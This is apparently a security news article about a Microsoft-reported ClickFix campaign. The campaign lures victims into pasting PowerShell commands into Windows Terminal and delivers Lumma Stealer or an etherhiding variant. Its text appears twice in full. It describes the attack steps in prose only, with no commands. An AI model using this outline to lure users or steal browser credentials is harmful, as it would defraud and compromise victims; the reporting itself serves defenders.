Attackers have found a way to outsmart even the most cautious users.
Microsoft researchers have discovered a new wave of social engineering, in which attackers have modified the traditional ClickFix attack method . Instead of traditionally launching malicious commands through the Run window, the criminals have begun using the Windows Terminal. This approach helps bypass security mechanisms and makes the actions appear more like regular administrative operations.
The Microsoft Defender Experts team reported that the activity was detected in February 2026. The malicious scheme begins with instructions to the victim that appear to be a routine check or technical procedure. The user is prompted to open the system menu by pressing the Windows key + X and select Terminal or PowerShell. Once opened, the user is prompted to paste the contents of the clipboard and press Enter.
This scenario disguises itself as standard administrator actions and arouses less suspicion. While many security solutions detect abuse of the Run dialog box, they don't always detect exploits using the Terminal. As a result, the attack evades some detection systems.
PowerShell commands are distributed through fake CAPTCHA pages, "verification" windows, or pseudo-troubleshooting instructions. At first glance, these pages appear to be normal web interface elements, so victims often follow the suggested actions.
After the command is inserted, a chain of additional processes is launched. One of the processes decrypts the embedded hexadecimal command, compressed using XOR. The script then downloads the legitimate 7-Zip utility, renamed by the attackers. The archiver unpacks the components of the multi-stage attack.
Further actions include downloading additional modules, creating scheduled tasks, and adding exclusions to Microsoft Defender . The malicious tools also collect information about the infected computer's system and network environment. The final component is the Lumma Stealer module , which injects code into Chrome and Edge browser processes using the QueueUserAPC mechanism. This allows the attackers to access browser data, including the Web Data and Login Data files, where saved credentials are stored.
Experts also identified an alternative attack scenario. In this case, a PowerShell command downloads a .bat file, which creates a VBScript via cmd.exe. The script is run via MSBuild and connects to RPC nodes of blockchain networks. This approach indicates the use of an etherhiding technique, whereby malicious infrastructure is hidden behind blockchain services.
Microsoft notes that Microsoft Defender's built-in protections are capable of detecting many elements of the campaign. However, this new scheme demonstrates the evolution of social engineering. Attackers are increasingly disguising malicious actions as normal system operations to increase victims' trust and reduce the likelihood of detection.
Microsoft researchers have discovered a new wave of social engineering, in which attackers have modified the traditional ClickFix attack method . Instead of traditionally launching malicious commands through the Run window, the criminals have begun using the Windows Terminal. This approach helps bypass security mechanisms and makes the actions appear more like regular administrative operations.
The Microsoft Defender Experts team reported that the activity was detected in February 2026. The malicious scheme begins with instructions to the victim that appear to be a routine check or technical procedure. The user is prompted to open the system menu by pressing the Windows key + X and select Terminal or PowerShell. Once opened, the user is prompted to paste the contents of the clipboard and press Enter.
This scenario disguises itself as standard administrator actions and arouses less suspicion. While many security solutions detect abuse of the Run dialog box, they don't always detect exploits using the Terminal. As a result, the attack evades some detection systems.
PowerShell commands are distributed through fake CAPTCHA pages, "verification" windows, or pseudo-troubleshooting instructions. At first glance, these pages appear to be normal web interface elements, so victims often follow the suggested actions.
After the command is inserted, a chain of additional processes is launched. One of the processes decrypts the embedded hexadecimal command, compressed using XOR. The script then downloads the legitimate 7-Zip utility, renamed by the attackers. The archiver unpacks the components of the multi-stage attack.
Further actions include downloading additional modules, creating scheduled tasks, and adding exclusions to Microsoft Defender . The malicious tools also collect information about the infected computer's system and network environment. The final component is the Lumma Stealer module , which injects code into Chrome and Edge browser processes using the QueueUserAPC mechanism. This allows the attackers to access browser data, including the Web Data and Login Data files, where saved credentials are stored.
Experts also identified an alternative attack scenario. In this case, a PowerShell command downloads a .bat file, which creates a VBScript via cmd.exe. The script is run via MSBuild and connects to RPC nodes of blockchain networks. This approach indicates the use of an etherhiding technique, whereby malicious infrastructure is hidden behind blockchain services.
Microsoft notes that Microsoft Defender's built-in protections are capable of detecting many elements of the campaign. However, this new scheme demonstrates the evolution of social engineering. Attackers are increasingly disguising malicious actions as normal system operations to increase victims' trust and reduce the likelihood of detection.
